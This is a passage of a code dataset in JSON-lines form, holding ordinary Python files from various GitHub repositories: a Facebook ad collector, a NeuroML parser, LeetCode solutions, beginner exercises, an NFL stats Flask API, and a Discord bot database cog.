config['POSTGRES']['DBNAME']\nUSER = config['POSTGRES']['USER']\nPASSWORD = config['POSTGRES']['PASSWORD']\nPORT = config['POSTGRES']['PORT']\nDBAuthorize = \"host=%s dbname=%s user=%s password=%s port=%s\" % (HOST, DBNAME, USER, PASSWORD, PORT)\nconnection = psycopg2.connect(DBAuthorize)\ncursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n\nall_ids = 
list(page_ids)\nrandom.shuffle(all_ids)\nprint(all_ids)\nprint(len(all_ids))\n\n#data structures to hold new ads\nAdRecord = namedtuple('AdRecord', ['archive_id', \n 'page_id', \n 'image_url', \n 'text',\n 'sponsor_label',\n 'creation_date', \n 'start_date', \n 'end_date', \n 'is_active', \n 'min_impressions', \n 'max_impressions', \n 'min_spend', \n 'max_spend',\n 'currency',\n 'ad_creative_link_caption',\n 'ad_creative_link_description',\n 'ad_creative_link_title'])\nPageRecord = namedtuple('PageRecord', ['id', 'name'])\nSnapshotRegionRecord = namedtuple('SnapshotRegionRecord', ['archive_id', 'name', 'min_impressions', 'max_impressions', 'min_spend', 'max_spend', 'crawl_date'])\nSnapshotDemoRecord = namedtuple('SnapshotDemoRecord', ['archive_id', 'age_range', 'gender', 'min_impressions', 'max_impressions', 'min_spend', 'max_spend', 'crawl_date'])\nFB_ACCESS_TOKEN = config['FACEBOOK']['TOKEN']\nSLEEP_TIME = int(config['SEARCH']['SLEEP_TIME'])\nfield_list = [\"ad_creation_time\",\"ad_delivery_start_time\",\"ad_delivery_stop_time\",\"ad_snapshot_url\", \"currency\", \"demographic_distribution\", \"impressions\", \"page_id\", \"page_name\", \"region_distribution\", \"spend\", \"ad_creative_body\", \"funding_entity\", \"ad_creative_link_caption\", \"ad_creative_link_description\", \"ad_creative_link_title\"]\n\n\nfor id in all_ids:\n main(id, connection)\n\nconnection.close()\n","repo_name":"CybersecurityForDemocracy/FacebookApiPolAdsCollector","sub_path":"page_id_fb_collector.py","file_name":"page_id_fb_collector.py","file_ext":"py","file_size_in_byte":23143,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"61"} +{"seq_id":"1042736983","text":"import os;\nimport xml.etree.ElementTree as ET\nimport csv\nimport threading\nimport re\n\n\n#This function reads the file names and seperates the .cell.nml files from the rest of the files\ndef readfiles(): \n print(\"Processing \",len(os.listdir(dir)))\n for filename in os.listdir(dir):\n if(filename.endswith(\".cell.nml\")):\n cellFiles.append(filename)\n\n cellFiles.sort()\n\ndef getPubMedId():\n #As we don't have any PubMed in cell files, we are using the default PubMed from the referred paper\n return \"26451489\"\n\ndef writeCellRows():\n\n cellIndex = 0\n cellIncludes = []\n\n for cellFile in cellFiles:\n\n print(cellFile)\n\n # Reuse includes from first cell, all cells have same includes\n if len(cellIncludes) == 0:\n cv = dir + cellFile;\n tree = ET.parse(cv);\n root = tree.getroot();\n\n for child in root:\n if(child.tag ==\"{http://www.neuroml.org/schema/neuroml2}include\"):\n if(child.attrib['href']):\n cellIncludes.append(child.attrib['href']);\n\n modelName, neurolexTerms, neurolexIDs, keywords = parseAcronyms(cellFile)\n\n modelName = modelNameCleanup(modelName)\n\n [children_set.add(child) for child in cellIncludes]\n\n writeCellRow(modelName + \" (\" + str(cellIndex % 5 + 1) + \")\", cellIncludes, cellFile, neurolexTerms, neurolexIDs, keywords)\n\n cellIndex += 1\n\ndef appendToFile(row): #\n resultFile = open(\"cells_data.csv\", 'ab')\n wr = csv.writer(resultFile, dialect='excel')\n wr.writerow(row)\n resultFile.close();\n\ndef writeCellRow(modelName, cellIncludes,cellFile,neurolexTerms, neurolexIDs, keywords):\n row=[]\n row.append('CL')\n row.append(modelName)\n row.append(cellFile)\n row.append(','.join(cellIncludes))\n row.append('(BlueBrainProject,https://bbp.epfl.ch/nmc-portal/downloads)')\n row.append(neurolexTerms)\n row.append(neurolexIDs)\n row.append(keywords)\n 
row.append(getPubMedId())\n row.append('Padraig Gleeson')\n row.append('none')\n\n appendToFile(row)\n\ndef modelNameCleanup(name):\n return name.replace(\"Layer 2, Layer 3\",\"Layer 2/3\")\n\ndef parseAcronyms(filename):\n\n # Find the cell file acronyms\n match = re.match(r\"(\\w+?)(?:int)?\\d+?_(\\w+?)_((?:\\w+?(?:_L1|_L4)|\\w+?))_\", filename)\n etype = match.group(1)\n layer = match.group(2)\n mtype = match.group(3)\n\n fullE, neurolexE, keywordsE = getAcronymData(etype)\n fullL, neurolexL, keywordsL = getAcronymData(layer)\n fullM, neurolexM, keywordsM = getAcronymData(mtype)\n\n return (fullL + \" \" + fullE + \" \" + fullM), \\\n (fullE + \",\" + fullL + \",\" + fullM), \\\n (neurolexE + \",\" + neurolexL + \",\" + neurolexM), \\\n (keywordsE + \",\" + keywordsL + \",\" + keywordsM)\n\nterms = []\n\ndef getAcronymData(acronym):\n\n # Cache the term mapping file\n if len(terms) == 0:\n with open('term_mapping.csv', 'rb') as f:\n reader = csv.reader(f)\n reader.next()\n for row in reader:\n terms.append(row)\n\n for row in terms:\n if(acronym == row[0]):\n return row[1],row[2],row[3]\n\n return \"none\",\"none\",\"none\"\n\ndef getAvailableChannels():\n channelChildren = set()\n with open('ChannelsReformat.csv', 'rb') as channels:\n reader = csv.reader(channels)\n reader.next()\n for row in reader:\n channelChildren.add(row[2])\n #print channelChildren\n return channelChildren\n\ndef nonExistingChannels(childCells, channelChildren):\n return childCells - channelChildren\n\n\nif __name__ == \"__main__\":\n # import pydevd\n # pydevd.settrace('10.211.55.3', port=4200, stdoutToServer=True, stderrToServer=True)\n\n dir = cv = \"cells/\" # path to cells folder\n cellFiles = []\n cell_channel ={}\n children_set = set()\n readfiles();\n resultFile = open(\"cells_data.csv\", 'wb')\n wr = csv.writer(resultFile, 'excel')\n wr.writerow(['modelType', 'modelName', 'fileName', 'children', 'references', 'neurolexTerm', 'neurolexURI', 'keywords', 'pubmedID', 'translator', 'authors']);\n resultFile.close()\n writeCellRows();\n getAvailableChannels()\n print(nonExistingChannels(children_set, getAvailableChannels()))\n\n","repo_name":"scrook/neuroml-db","sub_path":"Import Scripts/Sources/HBP/cellParser.py","file_name":"cellParser.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"28367878161","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def recoverTree(self, root: Optional[TreeNode]) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n stack = []\n count = 2\n pred = None\n x = y = None\n while stack or root:\n # keep traversing left\n while root:\n stack.append(root)\n root = root.left\n # when no more left node\n # pop the stack top\n root = stack.pop()\n if pred and root.val < pred.val:\n y = root\n if not x:\n x = pred\n else:\n break\n # root is the predecessor to the next node\n pred = root\n # go right\n root = root.right\n x.val , y.val = y.val, x.val\n ","repo_name":"medasuryatej/InterviewPrep","sub_path":"99-recover-binary-search-tree/99-recover-binary-search-tree.py","file_name":"99-recover-binary-search-tree.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4732505075","text":"#Basic Numerical 
Operations\r\n#\r\n# +\r\n# -\r\n# *\r\n# /\r\n# %\r\n# // (Floor)\r\n# ** (Exponentiation)\r\n\r\ndef arithmatic():\r\n    age1 = 9\r\n    age2 = 8\r\n    age3 = 6\r\n    sum_age = age1+age2+age3\r\n    print(f\"Sum of Age: {sum_age}\")\r\n    avarage_age_floor = sum_age//3\r\n    avarage_age_frac = sum_age/3\r\n    print(f\"Average Age(int): {avarage_age_floor}\\nAverage Age(fraction): {avarage_age_frac}\")\r\n\r\n\r\ndef modular():\r\n    x = 899\r\n    y = 5\r\n    z = (x%y)%y\r\n    zz = x%y\r\n    print(z,zz)\r\n\r\ndef expon():\r\n    a,b =input().split()\r\n    print(int(a)**int(b)) #pow(a,b)\r\n\r\n\r\nif __name__ == '__main__':\r\n    arithmatic()\r\n    modular()\r\n    expon()\r\n","repo_name":"SihabSahariar/BRACU-CSE","sub_path":"CSE111-Python/CSE111-Python-master/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"13329029539","text":"# Mad Libs\n# Lorraine Bichara Assad\n# March 16, 2018\n# The program will first prompt the user for a series of inputs a la Mad Libs. For example, a singular noun, an adjective, etc. Then, once all the information has been inputted, the program will take that data and place them into a premade story template.\n\nnoun = raw_input(\"Introduce a noun: \")\nnoun2 = raw_input(\"Introduce another noun: \")\nadjective = raw_input(\"Introduce an adjective: \")\nverb = raw_input(\"Introduce a verb: \")\n\nmadLib = \"I am a teen-age \" + noun + \" who lives in a two-story \" + noun2 + \" on Mars. I will put this message in a/an \" + adjective + \" bottle and \" + verb + \" it into space and hope that it gets to Earth.\"\nprint(madLib)","repo_name":"lorbichara/100-days-of-code","sub_path":"Python/MadLib.py","file_name":"MadLib.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17770475216","text":"# Suppose you have a user-entered date and time such as 2015-1-21 9:01:30,\n# plus a timezone string such as UTC+5:00, both given as str; write a function that converts them to a timestamp:\nimport re\nfrom datetime import datetime, timezone, timedelta\ndef to_timestamp(ddt_str,tz_str):\n    m=re.match(r'^UTC(\\+|-)(0[0-9]|[0-9]):00',tz_str)\n    UTC=int(m.group(1)+m.group(2))\n    cday=datetime.strptime(ddt_str,'%Y-%m-%d %H:%M:%S')\n    utc_dt=cday.replace(tzinfo=timezone(timedelta(hours=UTC)))\n    timestp=utc_dt.timestamp()\n    return timestp\n\nprint(to_timestamp('2015-5-31 16:10:30', 'UTC-09:00'))\n    \n","repo_name":"wudongdong1000/Liaopractice","sub_path":"practice_34.py","file_name":"practice_34.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23585060851","text":"import fileinput\n\n\ndef solve(time_array, source, target):\n    N = len(time_array)\n    real_time = []\n    max_time = time_array[source][target]\n    for n in range(N):\n        real_time.append([max_time] * N)\n        real_time[-1][n] = 0\n\n    queue = [source]\n    while len(queue) > 0:\n        s = queue.pop(0)\n        for t in range(N):\n            if real_time[source][s] + time_array[s][t] > max_time:\n                continue\n            if real_time[source][s] + time_array[s][t] < real_time[source][t]:\n                real_time[source][t] = real_time[source][s] + time_array[s][t]\n                if target == t:\n                    max_time = real_time[source][t]\n                else:\n                    queue.append(t)\n\n    return real_time[source][target]\n\n\n\n\ndef make_time_arr(horses, distance):\n    N = len(horses)\n    time_dist = []\n    max_time = 10**12\n    for n in range(N):\n        time_dist.append([max_time] * N)\n        time_dist[-1][n] = 0\n\n    for i, h in enumerate(horses):\n        hdist, hspeed 
= h\n queue = [(i, hdist)]\n\n while len(queue) > 0:\n source, dist = queue.pop(0)\n for target in range(N):\n if distance[source][target] < 0 or distance[source][target] > dist:\n continue\n time = distance[source][target] / hspeed\n if time_dist[i][source] + time < time_dist[i][target]:\n time_dist[i][target] = time_dist[i][source] + time\n queue.append((target, dist - distance[source][target]))\n\n return time_dist\n\ninp = fileinput.input()\n\nnum_cases = int(inp.readline())\nfor t in range(1, num_cases + 1):\n N, Q = (int(x) for x in inp.readline().split())\n horses = []\n for _ in range(N):\n horses.append(tuple(int(x) for x in inp.readline().split()))\n distance = []\n\n for _ in range(N):\n distance.append(tuple(int(x) for x in inp.readline().split()))\n assert len(distance[-1]) == N\n\n time_arr = make_time_arr(horses, distance)\n\n times = []\n for _ in range(Q):\n U,V = (int(x) for x in inp.readline().split())\n times.append(solve(time_arr, U-1, V-1))\n\n print(\"Case #{}: {}\".format(t, \" \".join(\"{:.6f}\".format(t) for t in times)))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_208/65.py","file_name":"65.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23478181644","text":"from rest_framework import serializers\nfrom .models import Task\n\n\nclass TaskSerializer(serializers.ModelSerializer):\n class Meta:\n model = Task\n fields = ('id', 'title', 'completed')\n\n def validate_title(self, value):\n # Add custom validation logic here\n if len(value) < 5:\n raise serializers.ValidationError(\n \"Title must be at least 5 characters long.\")\n return value\n\n def validate_completed(self, value):\n # Add custom validation logic here\n if value and not self.instance:\n raise serializers.ValidationError(\n \"A new task cannot be completed.\")\n return value\n","repo_name":"Elian-ui/recipe-django","sub_path":"recipemanager/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12515546767","text":"T = int(input())\nfor t in range(1, T+1):\n N = int(input())\n values = []\n for i in range(N):\n values.append(list(map(int, input().split())))\n max_value = -1\n for row in range(N):\n for col in range(N):\n if row > 1 and col > 1:\n break\n val = 0\n for delta in range(N):\n if row + delta >= N or col + delta >= N:\n break\n val += values[row+delta][col+delta]\n if max_value < val:\n max_value = val\n print('Case #{}: {}'.format(t, max_value))\n","repo_name":"satojkovic/algorithms","sub_path":"kickstart/2020/RoundG/maximum_coins.py","file_name":"maximum_coins.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36626885574","text":"'''\n@Author : \n@Contact : \n'''\n\nfrom package_parameters.parameters_fullImgMotion import Parameters\nimport package_utils.fold_handler as fh\nimport os\nfrom shutil import copyfile\n\ndef setParameters():\n\n p=Parameters(\n MODEL_NAME='raft',\n PRES='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/NETWORK_TRAINING/RAFT_PRETRAINED_FLYINGCHAIR_10_PX_FINE_TUNING',\n PSAVE='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/PREDICTION/DL_METHOD_FULL_IMAGES',\n PDATA='/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/IN_SILICO/REAL_DATA/prepared_data_IMAGENET',\n DROPOUT=0,\n 
CORRELATION_LEVEL=4,\n CORRELATION_RADIUS=4,\n RESTORE_CHECKPOINT=True,\n ALTERNATE_COORDINATE=False,\n PSPLIT=\"/run/media/laine/DISK/PROJECTS_IO/caroSegMotion/IN_SILICO/REAL_DATA/SPLIDATA/validation_patients.txt\",\n PIXEL_WIDTH=256,\n PIXEL_HEIGHT=256,\n ROI_WIDTH=5e-3,\n SHIFT_X=32,\n SHIFT_Z=32)\n\n pparam=os.path.join(p.PRES, 'backup_parameters')\n fh.create_dir(pparam)\n\n # --- Print all attributes in the console\n attrs=vars(p)\n print('\\n'.join(\"%s: %s\" % item for item in attrs.items()))\n print('----------------------------------------------------------------')\n\n # --- Save a backup of the parameters so it can be tracked on Git, without requiring to be adapted by from other contributors\n copyfile(os.path.join('package_parameters', os.path.basename(__file__)), os.path.join(pparam, 'get_parameters_training.py'))\n\n # --- Return populated object from Parameters class\n return p\n","repo_name":"nl3769/CCA_DL_TOOLS","sub_path":"caroDeepMotion/package_parameters/set_parameters_fullImgMotion_template.py","file_name":"set_parameters_fullImgMotion_template.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21329603390","text":"import pygame\n\nfrom random import randint\nfrom configs import *\n\n\ndef verify_colisions(sprite_group_a: pygame.sprite.Group, sprite_group_b:pygame.sprite.Group):\n \"\"\"Verifica a colisão dos grupos e mata o grupo concorrente em caso de colisão:\n\n Args:\n sprite_group_a (pygame.sprite.Group): Grupo que colide. Este grupo deleta o grupo B\n sprite_group_b (pygame.sprite.Group): Grupo a ser colidido. Este grupo é deletado pelo grupo A.\n \"\"\"\n colision_dict: dict[pygame.sprite.Sprite] = pygame.sprite.groupcollide( sprite_group_a, sprite_group_b, False, False)\n if len(colision_dict) != 0:\n print(f'Colisões detectadas {sprite_group_a} >>> {sprite_group_b}')\n for sprite in colision_dict:\n sprite.kill()\n\ndef verify_sprite_errors(sprite):\n \"\"\"Verifica se a Sprite está de acordo com os padrões do sistema: Ela precisa possuir os atributos rect e speed\n\n Args:\n sprite (pygame.sprite.Sprite): Objeto sprite em questão\n \"\"\"\n try:\n sprite.speed\n sprite.rect\n int(sprite.speed)\n except Exception:\n Exception('\\n\\nO valor inserido não é uma sprite ou não possui o atributo speed do tipo inteiro\\n\\n')\n\ndef calculate_distance(sprite: pygame.sprite.Sprite, target: pygame.sprite.Sprite):\n \"\"\"Calcula a distancia entre 2 sprite.\n\n Args:\n sprite (sprite.Sprite): Sprite usado como ponto A\n target (sprite.Sprite): Sprite usado como ponto B\n\n Returns:\n int: Distancia entre os dois pontos\n \"\"\"\n verify_sprite_errors(sprite)\n dx = sprite.rect.x - target.rect.x\n dy = sprite.rect.y - target.rect.y\n distance = (dx ** 2 + dy ** 2) ** 0.5\n print(f'distância x: {dx} | distância y: {dy}')\n print({distance})\n return distance\n\ndef render_coordinates_aside(sprite_objct: pygame.sprite.Sprite, font:pygame.font.Font, color: pygame.color.Color):\n \"\"\"Gera texto com as coordenadas do objeto em x, y ao lado dele\n\n Args:\n sprite_objct (sprite.Sprite): Um objeto sprite com um uma rect \n font (font.Font): um objeto do tipo fonte para especificar qual fonte será renderizada\n color (color.Color): um objeto do tipo color do pygame\n\n Raises:\n Exception: Caso o objeto fornecido não seja \n \"\"\"\n try:\n text_surface = font.render(f'x:{sprite_objct.rect.x} y:{sprite_objct.rect.y}', True, color)\n except:\n raise Exception('\\n\\nO 
objeto fornecido não é do tipo \"pygame.font.Font\"\\n\\n')\n text_pos = (sprite_objct.rect.x + sprite_objct.rect.size[0] + 10, sprite_objct.rect.centery - text_surface.get_height()//2)\n window.blit(text_surface, text_pos) \n\ndef random_move(sprite):\n \"\"\"Movimenta a sprite de forma aleatoria\n Args:\n sprite (sprite.Sprite): Sprite a ser movimentada\n \"\"\"\n verify_sprite_errors(sprite)\n random_number = randint(0,10)\n move_random_x(sprite, random_number)\n move_random_y(sprite, random_number)\n\n\ndef move_random_x(sprite, random_coin):\n \"\"\"Movimenta a sprite de acordo com o numero fornecido: 0 para direita, 1 para esquerda\n\n Args:\n sprite (sprite.Sprite): Sprite a ser movida\n random_coin (int): numero especifico: 0 - 1\n \"\"\"\n if random_coin == 0: \n if sprite.rect.x < width - sprite.rect.size[0]: #se for muito para a direita da tela\n sprite.rect.move_ip(sprite.speed, 0)\n return\n sprite.rect.x -= sprite.speed\n if random_coin == 1:\n if sprite.rect.x > 0: #se for muito para a esquerda da tela\n sprite.rect.move_ip(-sprite.speed, 0)\n return\n sprite.rect.x += sprite.speed\n\ndef move_random_y(sprite , random_coin):\n \"\"\"Movimenta a sprite de acordo com o numero fornecido: 2 para baixo, 3 para cima\n\n Args:\n sprite (sprite.Sprite): Sprite a ser movida\n random_coin (int): numero especifico: 2 - 3\n \"\"\"\n if random_coin == 2:\n if sprite.rect.y < height - sprite.rect.size[0]: #se for muito para baixo\n sprite.rect.move_ip(0, sprite.speed)\n return\n sprite.rect.y -= sprite.speed\n if random_coin == 3:\n if sprite.rect.y > 0: #se for muito para cima\n sprite.rect.move_ip(0, -sprite.speed)\n return\n sprite.rect.y += sprite.speed\n","repo_name":"Jason21tod/square_wars","sub_path":"assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43144930420","text":"# We can either increase sum of nums1 or sum of num2\n# If we want to increase sum of nums1, we will select subarray from i to j with maximum sum of nums2[i] - nums1[i];\n# If we want to increase sum of num2, we will select subarray from i to j with maximum sum of nums1[i] - nums2[i];\n\n# Time Complexity -> O(N)\n# Space Complexity -> O(1)\nclass Solution:\n def kadane(self , a,size):\n max_so_far = -maxsize - 1\n max_ending_here = 0\n start = 0\n end = 0\n s = 0\n\n for i in range(0,size):\n\n max_ending_here += a[i]\n\n if max_so_far < max_ending_here:\n max_so_far = max_ending_here\n start = s\n end = i\n\n if max_ending_here < 0:\n max_ending_here = 0\n s = i+1\n return [max_so_far , start , end] # maximum subarray sum exists from index start to index end\n \n \n def maximumsSplicedArray(self, nums1: List[int], nums2: List[int]) -> int:\n dif1 , dif2 = [] , []\n n = len(nums1)\n for i in range(n):\n dif1.append(nums1[i]-nums2[i])\n dif2.append(nums2[i]-nums1[i])\n\n\n\t\t# base case: if no swapping done.\n ans = max( sum(nums1) , sum(nums2))\n \n \n # find answer after swapping eleemnts of nums2\n s1 , x1 , y1 = self.kadane(dif1 , n) \n if s1<=0:\n pass\n else:\n cur = 0\n for i in range(n):\n if x1<= i<=y1: # swap elements from index start to index end\n cur+=nums1[i]\n else:\n cur+=nums2[i]\n ans = max( ans , cur)\n\n # find naswer after swapping elements of nums1\n s2 , x2 , y2 = self.kadane(dif2 , n)\n if s2<=0:\n pass\n else:\n cur = 0\n for i in range(n):\n if x2<= i<=y2: # swap elements from index start to index end\n cur+=nums2[i]\n else:\n cur+=nums1[i]\n ans = max( 
ans , cur)\n \n return ans","repo_name":"hardik302001/leetcode","sub_path":"problems/maximum_score_of_spliced_array/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"10424666186","text":"import os\nimport sys\nfrom time import gmtime, strftime\nfrom flask import Flask, jsonify, render_template, abort, request, send_file, Response, send_from_directory, make_response, request, current_app\nfrom flask_compress import Compress\nfrom itertools import *\nimport nflgame\nimport logging\nfrom memory_profiler import profile\nimport ypc\n\napp = Flask(__name__)\nCompress(app)\n\nAPI_ROOT = '/api/v0';\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n\n@app.errorhandler(400)\ndef custom400(error):\n response = jsonify({'message': error.description})\n return response\n\n# SSL\nCHECK_URL = \"/.well-known/acme-challenge/E21iMwAQvH_ezOQTr1PIb-FTWQdhho1Q3KwJc0lpsvo\"\n@app.route(CHECK_URL)\ndef check_url():\n return \"E21iMwAQvH_ezOQTr1PIb-FTWQdhho1Q3KwJc0lpsvo.c98f0gzyazQulnJchxS6U0wR09DCHc4HutKAPXlEx_8\"\n\n# RELOAD NFLGAME\n@app.route('/reload')\ndef reload_nflgame():\n reload(nflgame)\n return render_template('index.html')\n\n@app.route('/update_players')\ndef update_players():\n import subprocess\n output = subprocess.check_output(['nflgame-update-players'], stderr=subprocess.STDOUT)\n return output\n\n# VIEWS\n@app.route('/')\ndef root():\n return render_template('index.html')\n\n@app.route('/top')\ndef top():\n return render_template('index.html')\n\n@app.route('/player/')\ndef player(path):\n return render_template('index.html')\n\n# API ROUTES\n@app.route(API_ROOT + '/player_name/')\ndef get_player_name(id):\n if id in nflgame.players:\n return jsonify(result = nflgame.players[id].name)\n else:\n abort(400, {\"description\": \"No such player with the ID: {}\".format(id)})\n\n@app.route(API_ROOT + '/data/', methods=['GET'])\ndef send_list(filename):\n return send_from_directory('static/data', filename)\n\n@app.route(API_ROOT + '/weeks/', methods=['GET'])\ndef weeks(year):\n return jsonify(result = ypc.get_weeks(year))\n\n@app.route(API_ROOT + '/toprushers//', methods=['GET'])\ndef toprushers(year,count=100):\n try:\n weeks = ypc.get_weeks(year)\n plays = nflgame.combine_game_stats(nflgame.games(int(year), weeks)).rushing().sort('rushing_yds').limit(int(count))\n topplayers = imap(ypc.get_rusher_stats, plays)\n return jsonify(result = list(topplayers))\n except Exception as e:\n abort(400, e)\n\n@app.route(API_ROOT + '/topreceivers//', methods=['GET'])\ndef topreceivers(year,count=100):\n try:\n weeks = ypc.get_weeks(year)\n plays = nflgame.combine_game_stats(nflgame.games(int(year), weeks)).receiving().sort('receiving_yds').limit(int(count))\n topplayers = imap(ypc.get_receiver_stats, plays)\n return jsonify(result = list(topplayers))\n except Exception as e:\n abort(400, e)\n\n@app.route(API_ROOT + '/rushingyards///', methods=['GET'])\n@app.route(API_ROOT + '/rushingyards////', methods=['GET'])\ndef rushingyards(playerid, team, year, week=None):\n try:\n if week:\n weeks = [int(week)]\n else:\n weeks = ypc.get_weeks(year)\n games = nflgame.games(int(year), week=weeks, home=team, away=team)\n if games != []:\n all_plays = nflgame.combine_plays(games)\n rushing_yds_per_att = list(ifilter(ypc.exists, imap(lambda x:ypc.parse_rushing_play(x,playerid), all_plays)))\n return jsonify(result = 
rushing_yds_per_att)\n except Exception as e:\n app.logger.error(\"error: {}\".format(e))\n return jsonify(result = [])\n\n@app.route(API_ROOT + '/receivingyards///', methods=['GET'])\n@app.route(API_ROOT + '/receivingyards////', methods=['GET'])\ndef receivingyards(playerid,team,year,week=None):\n try:\n if week:\n weeks = [int(week)]\n else:\n weeks = ypc.get_weeks(year)\n games = nflgame.games(int(year), week=weeks, home=team, away=team)\n if games != []:\n all_plays = nflgame.combine_plays(games)\n receiving_yds_per_att = list(ifilter(ypc.exists, imap(lambda x:ypc.parse_receiving_play(x,playerid), all_plays)))\n\n return jsonify(result = receiving_yds_per_att)\n except Exception as e:\n app.logger.error(\"error: {}\".format(e))\n return jsonify(result = [])\n\n@app.after_request\ndef add_cors(resp):\n \"\"\" Ensure all responses have the CORS headers. This ensures any failures are also accessible\n by the client. \"\"\"\n resp.headers['Accept-Ranges'] = 'bytes'\n resp.headers['Last-Modified'] = strftime(\"%a, %d %b %Y %X GMT\", gmtime())\n resp.headers['Access-Control-Allow-Origin'] = request.headers.get('Origin','*')\n resp.headers['Access-Control-Allow-Methods'] = 'POST, PUT, GET'\n resp.headers['Access-Control-Allow-Headers'] = request.headers.get(\n 'Access-Control-Request-Headers', 'Authorization' )\n if app.debug:\n resp.headers['Access-Control-Max-Age'] = '432000000'\n return resp\n\n###################\n\ndef main():\n port = int(os.environ.get('PORT',5000))\n app.debug = True\n app.run(host='0.0.0.0', port=port)\n\nif __name__ != '__main__':\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\nif __name__ == '__main__':\n main()\n","repo_name":"calvinhu/ypc-graph","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74506833475","text":"import logging\n\nimport aiopg\nimport aioredis\nfrom discord.ext.commands import Bot, Cog\nfrom pypika import PostgreSQLQuery\n\nfrom fresnel import constants\n\n\nlog = logging.getLogger(__name__)\n\n\nclass DBManager(Cog):\n REDIS_DEFAULT_DICT = {\n 'host': 'localhost',\n 'port': 6379,\n 'db': 0,\n 'password': None,\n }\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n async def _init(self):\n self.db_info = self.bot._config.get(\n 'psql_info',\n default=constants.PSQL_DEFAULT_DICT,\n comment=\"PostgreSQL database and user information\",\n )\n\n self.redis_info = self.bot._config.get(\n 'redis_info',\n default=self.REDIS_DEFAULT_DICT,\n comment=\"Redis remote dictionary server connection information\",\n )\n\n self.db_info = {\n k: v for k, v in self.db_info.items() if v is not None\n }\n\n needed = constants.PSQL_DEFAULT_DICT.keys() - self.db_info\n\n if needed:\n log.error(\"please fully configure your PostgreSQL information in \"\n \"your configuration file. \"\n f\"missing keys: {', '.join(needed)}\")\n raise ValueError(\n \"Postgres config. \"\n f\"missing keys: {', '.join(needed)}\"\n )\n\n needed = {'host', 'port', 'db'} - self.redis_info.keys()\n\n if needed:\n log.error(\"please fully configure your Redis information in \"\n \"your configuration file. \"\n f\"missing keys: {', '.join(needed)}\")\n raise ValueError(\n \"Redis config. 
\"\n f\"missing keys: {', '.join(needed)}\"\n )\n\n dsn = constants.PSQL_INFO_STR.format(**self.db_info)\n\n self.bot._db_pool = await aiopg.create_pool(dsn)\n log.info(\"db connection established\")\n\n self.bot._db_Query = PostgreSQLQuery\n\n self.bot.redis_pool = await aioredis.create_redis_pool(\n (self.redis_info['host'], self.redis_info['port']),\n db=self.redis_info['db'],\n password=self.redis_info.get('password'),\n encoding='utf-8',\n )\n log.info(\"Redis connection established\")\n\n def __unload(self):\n self.bot.redis_pool.close()\n\n\nasync def _setup(bot: Bot):\n cog = DBManager(bot)\n await cog._init()\n log.info(\"adding DBManager cog\")\n bot.add_cog(cog)\n\n\ndef setup(bot: Bot):\n log.info(\"running db setup until complete\")\n bot.loop.run_until_complete(_setup(bot))\n\n\ndef teardown(bot: Bot):\n log.info(\"removing DBManager cog\")\n bot.remove_cog(DBManager.__name__)\n","repo_name":"AkiraSama/fresnel","sub_path":"fresnel/core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71836049474","text":"from collections import Counter\nclass Solution(object):\n # Second Solution (Beats 30.03% of time)\n def findTheDifference(self, s1, s2):\n word1Count = Counter(s1)\n for ch in s2:\n if not ch in word1Count or word1Count[ch] <= 0: return ch\n else: word1Count[ch] -= 1\n\n return False\n\n # First Solution (Beats 6.03% of time)\n def findTheDifferenceFirst(self, s1, s2):\n word1Count = Counter(s1)\n word2Count = Counter(s2)\n result = list(word2Count - word1Count)\n print(result)\n return result[0]\n\n\ns = Solution()\nres = s.findTheDifference(\"abcd\", 